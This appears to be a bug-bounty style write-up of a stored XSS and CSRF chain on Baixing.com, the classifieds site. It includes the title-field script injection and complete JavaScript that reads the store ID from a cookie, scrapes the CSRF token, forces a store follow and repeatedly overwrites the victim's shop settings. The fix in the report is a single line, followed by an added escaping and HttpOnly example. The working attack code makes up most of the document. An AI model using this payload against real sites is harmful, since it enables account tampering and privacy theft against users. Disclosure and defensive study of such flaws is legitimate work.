People Network (Baixing.com) stored XSS + CSRF can obtain user privacy and change store data (the problem exists on the main site and all local sub-sites)
First, the problem: although a post title is limited to 25 characters, the characters themselves are not filtered, and the title is output in several places, each of which is a potential XSS point.
Payload: '"> <script src = //?.?> /*
Although the title is escaped where the post itself is displayed, opening the page source shows that other output points are not filtered.
Our script loads successfully here, but this is not yet the main site's www domain, and the tokens for the important operations live in the www domain.
After testing, we found that when you open a micro-store, all your posts will also appear in the micro-store, and the micro-store is in the WWW domain.
Let's check whether our payload is filtered in the micro-store.
First open my micro-store:
Some content fails to load, which suggests the problem is present. Open the page source:
Although several output points are filtered, there are many of them and some are not, so we now have another XSS, this time in the www domain.
So what can we do now?
There are many important operations on www.baixing.com,
including store settings, posted job listings, received resumes, and account details.
So can we use CSRF to tamper with and obtain this data? Yes (provided we can obtain the operation token).
Let's start by changing the shop settings. First, change your own store's settings while capturing the request:
We can see that the place in the red box is our shop name, shop description and shop address. The token and store id are not displayed in the red box!
If we want to change the store settings, the token and store id are required. How can we get them?
First, the store id is stored in a cookie that is not marked HttpOnly, so script can read it.
How do we get it?
if (document.cookie.indexOf("__u=") > 0) {
  var zhengze = /__u=\d*;/;        // matches the __u cookie (the store ID)
  var cookie = document.cookie;
  WeiDianId = String(zhengze.exec(cookie)).replace("__u=", "").replace(";", "");
}
If the cookie string contains __u, extract it with the regular expression, convert the match to a String, and strip "__u=" and ";"; what remains is the store ID.
With the store ID obtained, the remaining piece is the token.
First, go to the settings page to open the source file and directly search for the token:
The token sits in a hidden input, which is no obstacle: it can be fetched with an XHR request. Let's get it:
// minimal AJAX helper; the response text is passed to callback
function Connection(Sendtype, url, content, callback) {
  if (window.XMLHttpRequest) {
    var xmlhttp = new XMLHttpRequest();
  } else {
    var xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  }
  xmlhttp.onreadystatechange = function () {
    if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
      callback(xmlhttp.responseText);
    }
  };
  xmlhttp.open(Sendtype, url, true);
  xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xmlhttp.send(content);
}
// request the settings page and pull the 32-character token out of the hidden input
Connection("GET", "http://www.baixing.com/w/weishop/set", "", function (callback) {
  var zhengze = /value="\w{32}"/;
  SendToken = String(zhengze.exec(callback)).replace('value="', '').replace('"', '');
});
First define an AJAX helper, request the settings page with GET, and in the callback match the response against the regular expression, convert the match to a String, and strip value=" and the closing quote; what remains is the token.
Now we have everything needed, so let's write the payload:
var WeiDianId = "";
var SendToken = "";

// create the AJAX function
function Connection(Sendtype, url, content, callback) {
  if (window.XMLHttpRequest) {
    var xmlhttp = new XMLHttpRequest();
  } else {
    var xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  }
  xmlhttp.onreadystatechange = function () {
    if (xmlhttp.readyState == 4 && xmlhttp.status == 200) {
      callback(xmlhttp.responseText);
    }
  };
  xmlhttp.open(Sendtype, url, true);
  xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xmlhttp.send(content);
}

// get the store ID from the __u cookie
if (document.cookie.indexOf("__u=") > 0) {
  var zhengze = /__u=\d*;/;
  var cookie = document.cookie;
  WeiDianId = String(zhengze.exec(cookie)).replace("__u=", "").replace(";", "");
}

// GET the token from the hidden input on the settings page
Connection("GET", "http://www.baixing.com/w/weishop/set", "", function (callback) {
  var zhengze = /value="\w{32}"/;
  SendToken = String(zhengze.exec(callback)).replace('value="', '').replace('"', '');
});

// force the user to follow our store
var weidian = new Image();
weidian.src = "http://www.baixing.com/weishop/weishopFav?masterId=u112955608&visitorId=112955608";

// change the shop settings once both the store ID and the token are available
function SetWeiDian() {
  if (WeiDianId != "" && SendToken != "") {
    Connection("POST", "http://www.baixing.com/weishop/updateWeiShopInfo",
      "ShopName=0x_Jin&image%5B%5D=&desc=0x_Jin&address=0x_Jin&token=" + SendToken + "&showPhone=1&id=" + WeiDianId,
      function (callback) {});
  }
}

// after the page loads, retry every 0.5 seconds until the settings change goes through
setInterval("SetWeiDian()", 500);
This is the final payload. It does four things: follows our store via CSRF, obtains the store ID, obtains the token, and changes the shop settings.
Now let's look at the effect.
Before: our store is not yet followed:
After XSS is triggered:
The store settings are as follows:
After XSS is triggered:
Let's look at the requests that were sent:
Every request that changes the store settings is sent once every 0.5 seconds.
Why? Because we don't know how long the client will take to obtain the token, so the change is simply retried every 0.5 seconds.
Note that the setting is changed every 0.5 seconds, not every five seconds. It is easy to change.
Solution:
Filter the output.
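The fix the report points at, as an added example that is not code from the report or from Baixing: escape the title at every output point instead of relying on the 25-character length limit, and mark the store-ID cookie HttpOnly so script cannot read it. The two render contexts (text node on the post page, attribute in the micro-store listing) and the helper names are assumptions; the payload string is the one quoted in the report.

```javascript
// Added example, not part of the original report.
// The payload quoted in the report ('"> <script src=//?.?> /*).
const REPORT_PAYLOAD = "'\"> <script src=//?.?> /*";

// Encode the five characters that can break out of HTML text or attribute
// context. Encoding both quote styles is what makes the same function safe
// inside attribute values, where the report's payload starts with '">.
// '&' is encoded first so the other entities are not double-encoded.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Output point 1 (assumed): the title as a text node on the post page.
function renderPostTitle(title) {
  return '<h1 class="post-title">' + escapeHtml(title) + "</h1>";
}

// Output point 2 (assumed): the micro-store listing, where the title lands in
// a title="" attribute as well as in link text. Both go through escapeHtml.
function renderShopListing(title, postId) {
  return '<a href="/post/' + encodeURIComponent(postId) + '" title="' +
    escapeHtml(title) + '">' + escapeHtml(title) + "</a>";
}

// Count '<' characters in rendered HTML; with a fixed wrapper the count must
// equal the number of tags the template itself emits, so a payload that
// smuggled in its own tag would raise it.
function countTagOpens(html) {
  return (html.match(/</g) || []).length;
}

// Store-ID cookie with HttpOnly (and Secure) set, so document.cookie in the
// report's payload no longer exposes it. Attribute set is an assumption.
function buildStoreIdCookie(storeId) {
  return "__u=" + encodeURIComponent(storeId) + "; Path=/; HttpOnly; Secure; SameSite=Lax";
}
```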